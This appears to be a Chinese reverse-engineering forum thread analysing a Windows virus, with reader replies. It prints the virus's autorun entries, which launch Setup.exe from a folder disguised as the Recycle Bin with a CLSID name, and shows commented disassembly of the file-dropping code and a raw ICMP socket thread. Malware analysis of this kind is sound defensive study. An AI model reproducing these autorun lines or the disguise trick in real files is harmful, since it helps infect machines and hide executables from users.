0006ECC86F 70 65 6E 3D B4 F2 BF AA 28 26 4F 29 0D 0A 73open=打开(&O)..s
0006ECD868 65 6C 6C 5C 6F 70 65 6E 5C 43 6F 6D 6D 61 6Ehell\open\Comman
0006ECE864 3D 72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46d=recycle.{645FF
0006ECF830 34 30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46040-5081-101B-9F
0006ED0830 38 2D 30 30 41 41 30 30 32 46 39 35 34 45 7D08-00AA002F954E}
0006ED185C 53 65 74 75 70 2E 65 78 65 20 53 68 6F 77 0D\Setup.exe Show.
0006ED280A 73 68 65 6C 6C 5C 6F 70 65 6E 5C 44 65 66 61.shell\open\Defa
0006ED3875 6C 74 3D 31 2F 2F 0D 0A 73 68 65 6C 6C 5C 65ult=1//..shell\e
0006ED4878 70 6C 6F 72 65 3D D7 CA D4 B4 B9 DC C0 ED C6xplore=资源管理
0006ED58F7 28 26 58 29 0D 0A 73 68 65 6C 6C 5C 65 78 70?&X)..shell\exp
0006ED686C 6F 72 65 5C 43 6F 6D 6D 61 6E 64 3D 72 65 63lore\Command=rec
0006ED7879 63 6C 65 2E 7B 36 34 35 46 46 30 34 30 2D 35ycle.{645FF040-5
0006ED8830 38 31 2D 31 30 31 42 2D 39 46 30 38 2D 30 30081-101B-9F08-00
0006ED9841 41 30 30 32 46 39 35 34 45 7D 5C 53 65 74 75AA002F954E}\Setu
0006EDA870 2E 65 78 65 20 53 68 6F 77 p.exe Show
008789BE .6A 00 push 0 ; /pSecurity = NULL
008789C0 .8D85 F8FEFFFF lea eax, dword ptr ; |
008789C6 .50 push eax ; |Path
008789C7 .FF15 84908700 call dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA
008789CD .8D85 F8FEFFFF lea eax, dword ptr ;创建目录recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008789F0 > \6A 00 push 0 ; /hTemplateFile = NULL
008789F2 .68 80000000 push 80 ; |Attributes = NORMAL
008789F7 .6A 02 push 2 ; |Mode = CREATE_ALWAYS
008789F9 .6A 00 push 0 ; |pSecurity = NULL
008789FB .6A 00 push 0 ; |ShareMode = 0
008789FD .68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00878A02 .8D85 E8FDFFFF lea eax, dword ptr ; |
00878A08 .50 push eax ; |FileName
00878A09 .FF15 C4908700 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878A0F .8985 E4FDFFFF mov dword ptr , eax ;创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe
线程A6(无限循环):
0878043 .6A 40 push 40 ; /BufSize = 40 (64.)
00878045 .8D85 28FEFFFF lea eax, dword ptr ; |
0087804B .50 push eax ; |Buffer
0087804C .FF15 74928700 call dword ptr [<&WS2_32.#57>] ; \gethostname
00878052 .8D85 28FEFFFF lea eax, dword ptr ;得到主机名
00878058 .50 push eax ; /Name
00878059 .FF15 2C928700 call dword ptr [<&WS2_32.#52>] ; \gethostbyname
00877ABF > \6A 01 push 1 ; /Protocol = IPPROTO_ICMP
00877AC1 .6A 03 push 3 ; |Type = SOCK_RAW
00877AC3 .6A 02 push 2 ; |Family = AF_INET
00877AC5 .FF15 34928700 call dword ptr [<&WS2_32.#23>] ; \socket
00877ACB .8945 FC mov dword ptr , eax ;创建套接字
00877B04 .FF70 10 push dword ptr ; /AddrLen
00877B07 .8B85 40FAFEFF mov eax, dword ptr ; |
00877B0D .FF70 18 push dword ptr ; |pSockAddr
00877B10 .FF75 FC push dword ptr ; |Socket
00877B13 .FF15 60928700 call dword ptr [<&WS2_32.#2>] ; \bind
00877B19 .83F8 FF cmp eax, -1 ;绑定
00877974|.6A 00 push 0 ; /Callback = NULL
00877976|.FF75 1C push dword ptr ; |pOverlapped
00877979|.FF75 18 push dword ptr ; |pFromSize
0087797C|.FF75 14 push dword ptr ; |pFrom
0087797F|.8D45 F8 lea eax, dword ptr ; |
00877982|.50 push eax ; |pFlags
00877983|.8D45 F4 lea eax, dword ptr ; |
00877986|.50 push eax ; |pReceivedCount
00877987|.6A 01 push 1 ; |nBuffers = 1
00877989|.8D45 EC lea eax, dword ptr ; |
0087798C|.50 push eax ; |pBuffers
0087798D|.FF75 08 push dword ptr ; |Socket
00877990|.FF15 6C928700 call dword ptr [<&WS2_32.WSARecvFrom>>; \WSARecvFrom
00877996|.8945 FC mov dword ptr , eax ;接受
00877C1C .FF70 10 push dword ptr ; /ToLength
00877C1F .8B85 F4FBFFFF mov eax, dword ptr ; |
00877C25 .FF70 18 push dword ptr ; |pTo
00877C28 .6A 00 push 0 ; |Flags = 0
00877C2A .FFB5 B8F9FEFF push dword ptr ; |DataSize
00877C30 .8D85 F8FBFFFF lea eax, dword ptr ; |
00877C36 .50 push eax ; |Data = 0005EA74
00877C37 .FF75 FC push dword ptr ; |Socket
00877C3A .FF15 64928700 call dword ptr [<&WS2_32.#20>] ; \sendto
00877C40 .83F8 FF cmp eax, -1 ;发送...
大概的都分析了,驱动应该是杀进程的,加精,感谢分享. 做的很好,学习了 很好。。为学习提供了方便,,,这才叫共享。。。 我加Hmily 说个话他都没时间理我..
你用什么方法. :)eee建议再分析一下感染文件 学习了,谢谢楼主分享这么好的东西 你们是怎样分析的 工具能分享下嘛 我好想 试试 学习分析病毒软件 太深奥。囧
页:
[1]
2